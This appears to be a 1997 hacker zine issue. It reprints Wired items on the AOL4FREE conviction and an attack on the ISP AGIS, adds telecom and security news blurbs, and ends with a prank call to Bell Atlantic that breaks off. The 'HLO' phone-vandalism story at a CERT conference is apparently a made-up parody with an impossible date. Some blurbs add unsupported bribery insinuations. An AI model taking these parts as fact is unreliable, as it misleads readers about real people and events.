5:02am 22.Apr.97.PDT -- Nicholas Ryan, a college junior convicted for
authoring the original AOL4FREE program, will be leaving Yale University
this June to start a six-month home sentence, and two years of probation.

For 25 hours a week, he will be working at a special education program as a
form of community service. But on off-hours, Ryan will be working on an
encryption program for Windows 95, based on the Macintosh program that
stumped the Secret Service agents who confiscated his computer. "It would be
a mini-encrypted hard drive - every time you shut down the computer, all the
information would be totally encrypted."

Three weeks after his conviction, Ryan says he is ready to talk about his
hacker past, and to share his experience of creating a program in 1995 that
allowed hackers to use AOL without paying the hourly charge. Last week, Ryan
came forward with a 30-KB essay explaining his motives and experiences to
hacker sites. His confessions came the same week that the Department of
Energy put out a warning against the AOL4FREE "Trojan horse," a
file-destroying program that is masquerading as Ryan's original program.

"I was an outlaw, a spy," Ryan boasts, "and I loved cracking the puzzle of
AOL's system." During the days of US$2.95-an-hour pricing, AOL4FREE made
Ryan, aka Happy Hardcore, a hero in hacker chat rooms. "When I entered a
room, I'd immediately get dozens of messages asking about when my next
version would come out, who I knew, and many just thanking me." His essay
also includes anecdotes of hacking live chats and distributing AOL customer
data.

In a press release applauding his conviction, AOL conceded that hundreds used
the program to gain free access to the service. Ryan's is the first federal
felony conviction involving an online service, AOL claims. "AOL and the
prosecutors decided they wanted it to strike a blow against the hackers and
take me out as an example," Ryan said in an interview. "At one point they
were even claiming that the damages were US$1.5 million."

Ironically, Ryan had titled one section of the documentation for AOL4FREE
"Can I get caught?" He even supplied a prescient answer: "A better question
would be, 'Would they want to prosecute me if I'm caught?'" Ryan now claims
he'd been reassured by internal memos forwarded by hacker friends that AOL
would not go after him. "I assumed they were going after the AOL4FREE users.
Kind of a dumb assumption.... The Secret Service knocked on my door in
December."

Of the latest AOL4FREE decoy, Ryan says there's nothing new in naming
Trojan-horse programs after real ones. "I remember during 1995, way back
then, there was an AOL4FREE program that was actually a Trojan horse. So this
program may just be a couple of years old."

Mixed in with the harrowing stories of his exploits, Ryan's confessional
essay includes a disclaimer: "I stress that in no way did we EVER do anything
to cause permanent damage using the tools or information that we found." He
adds: "We could've taken down 500 file libraries. We could've massively
wreaked havoc on the service. But it wasn't what we were there for. It was a
puzzle of it, the challenge of it."

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

AGIS Keeps Mum Over Attack, FBI Inquiry
by Michael Stutz

11:55am 22.Apr.97.PDT -- One of the country's largest Internet service
providers is tight-lipped after an attack on its networks was revealed to be
more serious than originally reported.

Apex Global Information Services (AGIS), considered one of the "big six"
backbone Internet service providers, confirmed Monday that it has been the
target of an all-out network attack and that the FBI is investigating the
incident. In addition, the company has notified the Computer Emergency
Response Team.

Although the company would not comment on the scope of the FBI investigation,
a spokesman said that no private information was compromised.

Observers believe the attack is spam-related because of the company's
belligerent attitude toward unsolicited bulk email. A quick scan of the
Usenet groups such as news.admin.net-abuse reveals the depth of discontent
with the service.

AGIS, home to some of the most infamous spam factories on the Net, such as
CyberPromotions, is considered to be the world's largest "rogue" site by
anti-spam activists such as Robert Braver.

Braver on Monday published Implementing Warnings for AGIS Netblocks, a
collection of CGI scripts that webmasters could insert in their sites so that
anyone from an AGIS network connecting to a page on the site would receive a
warning message instead of the page's actual contents. The warning informs
the user that, because AGIS provides bandwidth to spammers, some sites and
networks may restrict access from their machines to AGIS.

It is exactly that sort of blocking that was originally feared to have caused
the recent AGIS attack.

Users who traced the route from hosts originating on network giant ans.net to
destinations in AGIS territory over the weekend noticed that their trail
ended abruptly at AGIS' connection to the servers where MFS Communications
Company Inc. administers to MAE-East, the largest national network access
point. Forty-six ISPs, including all major US and some European firms,
connect to routers here to exchange data with other networks.

This cut-off fueled speculation among the sleuthing users that ans.net, tired
of AGIS' spam-positive practices, configured one of their core routers to
ignore all traffic to or from the AGIS address space. But this was not the
case, as many hosts on MAE-East suffered similar routing problems during the
same time span.

Instead, the outage was most likely a hardware problem on AGIS' side -
possibly related to the attack.

Just what hardware failed and how is something AGIS appears to be keeping in
its vest pocket for now. Even the company spokesman is in the dark. "My
client hasn't told me whether or not [their silence] is because of the FBI
investigation, or what," said the spokesman, Steven Wright-Mark.

Nonetheless, it is likely that the company will be forced to change its
spam-positive ways; Wright-Mark confirmed that AGIS is expected to release a
statement sometime this week updating its position toward the highly
unpopular junk email. If this change materializes, it will be a welcome move
from a major ISP that, for a time, returned complaints and other email
reports of Net abuse back to the sender, unread.

©1993-97 Wired Ventures, Inc.
_____________________________________________________________

HLO brings chaos to CERT conference
by K.F. Fox

13:00pm 31.Apr.97.EST (HNS) -- At the CERT conference on communications
security held today in Atlanta, GA, an apparent reign of terror has begun at
the hands of a group of militant phone phreaks known only as the HAVOC
Liberation Organization, or HLO.

Throughout the Atlanta metropolitan area the telephone network has collapsed,
mainly due to malicious vandalism of telephone access boxes located on nearly
every city block of the region. Moments before this terror spree began, an
anonymous tip was called in to the Atlanta police, stating what could best be
described as "the end of telecommunications tyranny" as the unidentified
caller termed it. The caller, in the name of the HLO, claimed responsibility
for the terror, and stated that further destruction would be necessary if
the HLO's demands for cheaper and more widely available phone service were
not met.

Rufus Jones, a spokesman for Southern Bell, Atlanta's largest local phone
service provider, had this to say: "We stand firmly behind our pricing
policies, and believe that this attack is mainly aimed at long distance
carriers such as AT&T and Sprint." Ironically, the majority if not all of
the property damaged in this reign of terror is owned and operated by
Southern Bell. When asked if his company was indeed being singled out in the
rampage, Jones refused comment.

What is clear to investigators is that the amount of damage in this terror is
significant. Preliminary reports estimate the cost at between $1.2 and $2.8
million. Those figures do not include the loss in business revenue
anticipated as a result of this service outage.

Atlanta Police are now following several leads in their investigation,
including information provided by an informant working for the FBI.
According to Tsutmu Shimomura, chief investigator for the APD, the informant,
known only as "SINISTER", has been spying on the HLO through a super-secret
underground hacker chat network on the internet, known as IRC.

Through this network the HLO has discussed subjects ranging from prank phone
calls to destroying entire areacodes with a device known as a blotto box. It
is believed that the group's membership may number in the hundreds.

"I don't know who these guys are, but they're real mean, and I'm going to
write another autobiography when I catch them." said Shimomura.

HNS will continue to report on this story as more information becomes
available.

©1997 HAVOC News Service
_____________________________________________________________

[3rd Major NT Security Flaw]---------------------------------------------

Following Microsoft's Internet Explorer Web browser exploitation, another
major flaw was discovered in another Microsoft product, making it the 3rd
major 'hack'. 2 security technologists wrote code to exploit the major
security flaw in Microsoft's NT network operating system, which allowed the
remote user to decrypt critical files including the registry of user
passwords. Somehow I doubt Microsoft 'accidentally' overlooked such a
dangerous hole in one of their most advanced software productions. To no
surprise, Mike Nash (director of marketing for NT Server) has made no remark
at all about developing a possible 'patch'. A child could obtain these
passwords by sending a Trojan Horse to a user on the network. With these
flaws it is easily predicted that more sysadmins will turn to Unix for
security.
"We're still seeing bugs coming out of 20-year-old Unix, and NT is a
baby in comparison." -- Goggans

Based on an article first published on the web at www.eet.com only a few
days ago by Larry Lange.


[Maryland Begins 10 Digit Dialing]-----------------------------------------
As of May 1st 1997 ( the release date of this issue) Marylanders will
have to dial 10 digits for local calls. This is the same date that Bell
Atlantic adds 2 new area codes, 443 and 240 (not sure about the second area
code) to Maryland's two current area codes, 410 and 301. This is the second
time in the past ten years that Bell Atlantic has added area codes to
Maryland; however, when they added 410 a few years back, we still kept the
standard 7 digit dialing. Oh well, that's progress for you.


[The Bell Atlantic/ Nynex Merger Clears a Major Hurdle]----------------------
The coming Bell Atlantic/ Nynex merger, which was started off almost
a year ago, has cleared the Justice Department. Surprisingly, after first
passing each state's PTC ( Public Telephone Commission ) that the merger will
affect, it was declared that the merger does not violate antitrust measures
that will keep the monopoly and hurt the newcomers to the local phone
market. ( Yea right, I think this agreement came after some money had been
slipped under the table.... ) Anyway, now the merger only needs the blessing
of the FCC, which shouldn't be hard to get. Stay tuned for more details in
this 23 billion dollar deal.


[Inferno OS Beta Test is Released]-------------------------------------------
Lucent Technologies, formerly Bell Labs, but spun off into a new
private company, has released Inferno OS, a new operating system which looks
rather cool. It is mainly targeted to the programming and IS managers of the
computer world, but Lucent is opening its view, and seeing that Inferno would
make a viable internet host, and game development machine. It sounds like it
is mainly based for UNIX machines, but there are versions of this for almost
every platform. ( However, as of this writing, Slackware Linux is
unsupported while Red Hat is supported.) It is now looking like a
multipurpose OS like JavaOS, which can be ported to many platforms and all
apps will run and look the same. But, I think searching stuff on the internet
from your toaster is still a few years off. You can find out more information
and even download a copy of Inferno ( 20 mbs!) from:
http://www.lucent.com/inferno/
_____________________________________________________________
[ Phone Calls ]

[1] [ NOTE: First, let it be known, that if you didn't read the news, Bell
Atlantic customers in the Maryland area will have to use 10 digit dialing
beginning May first. So get ready for this. Of course, I have been dialing
all ten digits for local calls, to get practice so my calls will go thru ]

[ Crappy James Earl Jones Bell Atlantic Greeting]

Operator> Thank you for using Bell Atlantic. How may I help you?
Me> I want you to fix your phone system.
Operator> Excuse me?
Me> Your phone system, it keeps giving me a 'The number you have dialed is
not available, please hang up and try again'
Operator> Are you sure you are dialing the right number?
Me> Fuck yes I am, I'm adding the area code in, so I remember when to do it
when May 1st comes around. Without the area code, it works fine, fix your
damn system.
Operator> Sir, please try to calm down.....
Me> Fuck that! I am calm!
Operator> Sir, Please stop the abusive language....
Me> You want abusive language? I'll give you abusive language!
Operator> Sir, I can't explain why your calls aren't going through, maybe you
are dialing the wrong number.
Me> Do I sound like an idiot to you? Do I? Fuck you, let me speak with your
supervisor.
Operator> Are you sure you want to speak with my supervisor?
Me> Hell Yes I do
Operator> Ok sir, let me get them on the line for you....
[ Elevator Music ]
Supervisor> Sir?
Me> Yea, fix your damn phone system.
Supervisor> What?
Me> Damnit, I SAID FIX YOUR DAMN PHONE SYSTEM SO THAT I CAN USE THE AREA CODE
TO DIAL A LOCAL CALL SO I WILL BE IN GOOD SHAPE WHEN MAY FIRST IS HERE!
Supervisor> Sir, are you sure your calls are local? They may be long dis
